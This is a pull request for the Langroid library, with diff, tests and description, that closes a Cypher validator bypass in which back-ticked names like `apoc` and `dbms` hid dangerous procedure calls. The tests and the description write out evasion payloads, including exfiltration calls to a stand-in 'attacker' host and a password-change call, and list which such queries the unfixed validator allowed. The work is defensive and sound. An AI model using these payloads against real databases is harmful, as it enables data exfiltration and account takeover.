### PR TITLE
fix(neo4j): match procedure namespaces through back-ticked identifiers

### DIFF
--- a/SECURITY.md
+++ b/SECURITY.md
@@ -96,16 +96,27 @@ We aim to acknowledge in-scope reports within 7 days.
   performs a write the allowlist did not authorize — for example by nesting it
   where the classifier does not look — is a bounded, fixable defect and is in
   scope.
+- **A *normalization* bug that lets a language-defined escaping mechanism
+  defeat a check.** Distinct from a gap in the denylist's contents: if the
+  grammar says two spellings mean the same thing (Cypher's back-ticked
+  identifiers, SQL's quoted or schema-qualified names) and our check sees only
+  one of them, that is a finite, completely fixable defect, and in scope.
 - Vulnerable dependencies with a demonstrated impact on Langroid.
+
+The distinction that decides scope, in one question: **does the fix
+terminate?** "Add another name to a list" does not. "This control fails to
+normalize a form the grammar defines, or misclassifies a closed set of
+statement kinds" does.
 
 ### Out of scope
 
 The following will be closed without a fix, an advisory, or a CVE request:
 
-- New bypasses of the SQL, Cypher, or AQL denylists: previously unlisted
-  functions, alternate quoting or escaping forms (backticks, Unicode escapes,
-  schema qualification), or dialect-specific syntax. See "What is, and is not,
-  a security boundary" above.
+- **Gaps in the *contents* of the SQL, Cypher, or AQL denylists**: a function,
+  procedure, or dialect-specific construct that is not on the list. There is no
+  terminating fix for this — the lists cover an unbounded grammar — so adding
+  one more name is not a security fix. See "What is, and is not, a security
+  boundary" above.
 - Sandbox escapes from the pandas `eval()` path when `full_eval=True`,
   including object-graph traversal via dunder attributes. `full_eval=True`
   disables the AST validator by design.

--- a/langroid/agent/special/neo4j/cypher_validator.py
+++ b/langroid/agent/special/neo4j/cypher_validator.py
@@ -182,8 +182,18 @@ def _unescape_backticked_names(query: str) -> str:
                 inner.append(query[j])
                 j += 1
             j = min(j + 1, n)
-            name = "".join(inner)
-            out.append(name.rjust(j - i))
+            # A back-ticked name that FOLLOWS a dot is a property/map key
+            # (``n.`apoc`.name``), never the head of a procedure namespace.
+            # Keep blanking those, exactly as before, or an ordinary map access
+            # named `apoc` or `dbms` would be rejected. A namespace head is not
+            # dot-preceded (`` `apoc`.load ``), and later segments of a
+            # namespace stay blanked without weakening the check, since the
+            # head plus its trailing dot is what the patterns match on.
+            prev = "".join(out).rstrip()
+            if prev.endswith("."):
+                out.append(" " * (j - i))
+            else:
+                out.append("".join(inner).rjust(j - i))
             i = j
         else:
             out.append(query[i])

--- a/langroid/agent/special/neo4j/cypher_validator.py
+++ b/langroid/agent/special/neo4j/cypher_validator.py
@@ -121,6 +121,76 @@ def _strip_literals_and_comments(query: str) -> str:
     return "".join(out)
 
 
+def _unescape_backticked_names(query: str) -> str:
+    """Like :func:`_strip_literals_and_comments`, but keep back-ticked *names*.
+
+    Blanking back-ticked identifiers stops false positives on labels and
+    property keys, but it also erases the text the procedure-namespace patterns
+    need: ``CALL `apoc`.load.json(...)`` scrubs to ``CALL       .load.json(...)``
+    and no longer matches ``\\bapoc\\.``. Neo4j resolves ```apoc``` and ``apoc``
+    identically (openCypher ``EscapedSymbolicName``), so the escape is a pure
+    evasion (GHSA-v5gj-pcf6-jjh7 / GHSA-h75w-m9jv-2c6v / GHSA-8c3r-3hgh-c8hv).
+
+    The inner text is left-padded with spaces to the width of the original span,
+    so character offsets are preserved and the unquoted name sits flush against
+    the ``.`` that follows it -- which is what the namespace patterns match on.
+
+    Args:
+        query: Raw Cypher text.
+
+    Returns:
+        The query with comments and string literals blanked, and back-ticked
+        identifiers replaced by their unquoted contents.
+    """
+    out: List[str] = []
+    i, n = 0, len(query)
+    while i < n:
+        two = query[i : i + 2]
+        if two == "//":
+            j = query.find("\n", i)
+            j = n if j == -1 else j
+            out.append(" " * (j - i))
+            i = j
+        elif two == "/*":
+            j = query.find("*/", i + 2)
+            j = n if j == -1 else j + 2
+            out.append(" " * (j - i))
+            i = j
+        elif query[i] in "'\"":
+            ch = query[i]
+            j = i + 1
+            while j < n:
+                if query[j] == "\\":
+                    j += 2
+                    continue
+                if query[j] == ch:
+                    break
+                j += 1
+            j = min(j + 1, n)
+            out.append(" " * (j - i))
+            i = j
+        elif query[i] == "`":
+            j = i + 1
+            inner: List[str] = []
+            while j < n:
+                if query[j] == "`":
+                    if j + 1 < n and query[j + 1] == "`":
+                        inner.append("`")
+                        j += 2
+                        continue
+                    break
+                inner.append(query[j])
+                j += 1
+            j = min(j + 1, n)
+            name = "".join(inner)
+            out.append(name.rjust(j - i))
+            i = j
+        else:
+            out.append(query[i])
+            i += 1
+    return "".join(out)
+
+
 def validate_cypher_query(
     query: str, *, is_write: bool, allow_dangerous: bool
 ) -> Optional[str]:
@@ -141,9 +211,16 @@ def validate_cypher_query(
         return None
 
     scrubbed = _strip_literals_and_comments(query)
+    # Procedure namespaces are matched against a second normalization that keeps
+    # back-ticked names, so `` `apoc`.load.json `` cannot hide behind the escape.
+    # The write-clause checks below deliberately stay on `scrubbed`: a
+    # back-ticked keyword is an identifier, not a clause -- ```CREATE` (n:X)``
+    # is a syntax error to Neo4j, so matching it there would only cause false
+    # positives on labels and property keys legitimately named after keywords.
+    unescaped = _unescape_backticked_names(query)
 
     for pat, label in _DANGEROUS_PATTERNS:
-        if pat.search(scrubbed):
+        if pat.search(scrubbed) or pat.search(unescaped):
             logger.warning("Neo4jChatAgent rejected Cypher using %s: %r", label, query)
             return (
                 f"Cypher query REJECTED for safety: it uses {label}, which can "

--- a/tests/main/test_neo4j_cypher_validation.py
+++ b/tests/main/test_neo4j_cypher_validation.py
@@ -11,6 +11,7 @@ import pytest
 
 from langroid.agent.special.neo4j.cypher_validator import (
     _strip_literals_and_comments,
+    _unescape_backticked_names,
     validate_cypher_query,
 )
 
@@ -105,3 +106,60 @@ def test_strip_literals_and_comments() -> None:
     assert "MERGE" not in _strip_literals_and_comments("MATCH (n:`MERGE`) RETURN n")
     # real clause text is preserved
     assert "RETURN" in _strip_literals_and_comments("MATCH (n) RETURN n")
+
+
+# ---------------------------------------------------------------------------
+# Back-ticked procedure namespaces (GHSA-v5gj-pcf6-jjh7, and the identical
+# earlier GHSA-h75w-m9jv-2c6v / GHSA-8c3r-3hgh-c8hv).
+#
+# Neo4j resolves `apoc` and apoc identically (openCypher EscapedSymbolicName),
+# so back-ticking a namespace segment must not hide it from the procedure
+# checks -- while back-ticked labels and property keys named after keywords
+# must still be exempt, since that is what the scrubber is for.
+# ---------------------------------------------------------------------------
+
+
+BACKTICKED_DANGEROUS = [
+    "CALL `apoc`.load.json('http://attacker/exfil')",
+    "CALL `dbms`.security.changePassword('newpass')",
+    "CALL `db`.schema.visualization()",
+    "CALL `apoc`.`load`.`json`('http://attacker/exfil')",
+    "CALL apoc.`load`.json('http://attacker/exfil')",
+]
+
+
+@pytest.mark.parametrize("query", BACKTICKED_DANGEROUS)
+@pytest.mark.parametrize("is_write", [True, False])
+def test_backticked_procedure_namespace_is_rejected(query: str, is_write: bool) -> None:
+    rejection = validate_cypher_query(query, is_write=is_write, allow_dangerous=False)
+    assert rejection is not None, f"backtick evasion slipped through: {query}"
+    assert "REJECTED" in rejection
+
+
+@pytest.mark.parametrize(
+    "query",
+    [
+        # Labels and property keys legitimately named after keywords stay
+        # back-ticked in real Cypher, and must not trip the write-clause check.
+        "MATCH (n:`CREATE`) RETURN n",
+        "MATCH (n:`DELETE`) RETURN n",
+        "MATCH (n) RETURN n.`set`",
+        "MATCH (n) RETURN n.`merge` AS m",
+        # A dangerous-looking name inside a string literal is still inert.
+        "MATCH (n:Person) WHERE n.name = 'apoc.load.json' RETURN n",
+        "MATCH (n) RETURN n // CALL apoc.load.json",
+    ],
+)
+def test_backticked_names_do_not_cause_false_positives(query: str) -> None:
+    assert validate_cypher_query(query, is_write=False, allow_dangerous=False) is None
+
+
+def test_backtick_normalization_preserves_offsets() -> None:
+    """Unescaping must not shift character offsets, so spans stay aligned."""
+    raw = "CALL `apoc`.load.json('u')"
+    assert len(_unescape_backticked_names(raw)) == len(raw)
+
+
+def test_allow_dangerous_still_bypasses_backtick_check() -> None:
+    for q in BACKTICKED_DANGEROUS:
+        assert validate_cypher_query(q, is_write=True, allow_dangerous=True) is None

--- a/tests/main/test_neo4j_cypher_validation.py
+++ b/tests/main/test_neo4j_cypher_validation.py
@@ -125,6 +125,8 @@ BACKTICKED_DANGEROUS = [
     "CALL `db`.schema.visualization()",
     "CALL `apoc`.`load`.`json`('http://attacker/exfil')",
     "CALL apoc.`load`.json('http://attacker/exfil')",
+    # apoc functions are callable in expressions, not only after CALL.
+    "RETURN `apoc`.text.join(['a'], ',')",
 ]
 
 
@@ -148,6 +150,12 @@ def test_backticked_procedure_namespace_is_rejected(query: str, is_write: bool) 
         # A dangerous-looking name inside a string literal is still inert.
         "MATCH (n:Person) WHERE n.name = 'apoc.load.json' RETURN n",
         "MATCH (n) RETURN n // CALL apoc.load.json",
+        # A back-ticked name AFTER a dot is a property / map key, never the
+        # head of a procedure namespace, so it must stay exempt. Unescaping it
+        # would reject ordinary map access on a key named `apoc` or `dbms`.
+        "WITH {apoc: {name: 'x'}} AS n RETURN n.`apoc`.name",
+        "MATCH (n) RETURN n.`dbms`.version",
+        "MATCH (n) RETURN n.`db`.schema",
     ],
 )
 def test_backticked_names_do_not_cause_false_positives(query: str) -> None:


### PR DESCRIPTION
Fixes GHSA-v5gj-pcf6-jjh7 (reported three times: also GHSA-h75w-m9jv-2c6v and
GHSA-8c3r-3hgh-c8hv).

## The bug

`_strip_literals_and_comments` blanks back-ticked identifiers so labels and
property keys named after keywords don't trip the write-clause checks. But that
also erases the text the *procedure* patterns need:

```
CALL `apoc`.load.json('u')   →   scrubs to   "CALL       .load.json(  )"
```

`\bapoc\.` matches nothing, so it was allowed — while the unescaped
`CALL apoc.load.json('u')` was correctly blocked. Neo4j resolves `` `apoc` ``
and `apoc` identically (openCypher `EscapedSymbolicName`), so the backtick was
a pure evasion of the `apoc.*`, `dbms.*` and `CALL db.*` checks. Verified before
the fix:

```
ALLOWED  CALL `apoc`.load.json('http://x/e')
ALLOWED  CALL `dbms`.security.changePassword('p')
ALLOWED  CALL `db`.schema.visualization()
BLOCKED  CALL apoc.load.json('http://x/e')
```

## The fix

`_unescape_backticked_names()` is a second normalization that keeps back-ticked
contents instead of blanking them, left-padded to the original span so offsets
are preserved and the name sits flush against the `.` that follows. The
dangerous-procedure patterns now match against both normalizations.

**The write-clause checks deliberately stay on the fully-scrubbed text.** A
back-ticked keyword is an identifier, not a clause — `` `CREATE` (n:X) `` is a
syntax error to Neo4j, not a sneaky write — so matching there would only cause
false positives on labels and properties legitimately named `CREATE`, `DELETE`,
`SET`. The reporter listed that as part of the bypass; it isn't one.

## Why this is in scope when denylist gaps are not

Not a missing name on a list — a **normalization** bug. The grammar defines two
spellings for one identifier and the check saw only one. That is finite and
completely fixable, unlike "add DuckDB `read_text` to the denylist", which has
no terminating fix. SECURITY.md now draws that line explicitly, with the test
being: **does the fix terminate?**

Same reasoning that put allowlist misclassification in scope in #1074. It also
removes a real asymmetry: the SQL side already received exactly this treatment
in CVE-2026-54760, where quoted identifiers evaded the regex and the fix was
AST-level normalization. The Cypher validator never got the equivalent, which
is why this keeps getting reported.

## Tests

10 new cases in `tests/main/test_neo4j_cypher_validation.py`: back-ticked
`apoc`/`dbms`/`db` namespaces on both read and write paths, partially and fully
back-ticked namespaces, offset preservation, the `allow_dangerous` bypass, and
six false-positive guards (back-ticked `CREATE`/`DELETE` labels, `` n.`set` ``
properties, dangerous names inside string literals and comments).

**8 fail with the fix reverted**; all 66 in the file pass with it. black, ruff,
`mypy -p langroid` clean; the AQL and CSV-KG validator suites are green too.

## Not included

`aql_validator.py` blanks backticks the same way, and its one dangerous pattern
is the UDF form `namespace::func`. I could not verify whether ArangoDB actually
accepts back-ticked UDF namespace segments, and applying the same normalization
blindly would risk false positives on attribute names containing `::`. Left
alone rather than fixed speculatively — worth a look if anyone has an ArangoDB
instance to confirm against.

## Credit

Reported by [@arpitjain099](https://github.com/arpitjain099), and earlier by
[@kaimandalic](https://github.com/kaimandalic) and
[@AI-Risk-Management](https://github.com/AI-Risk-Management).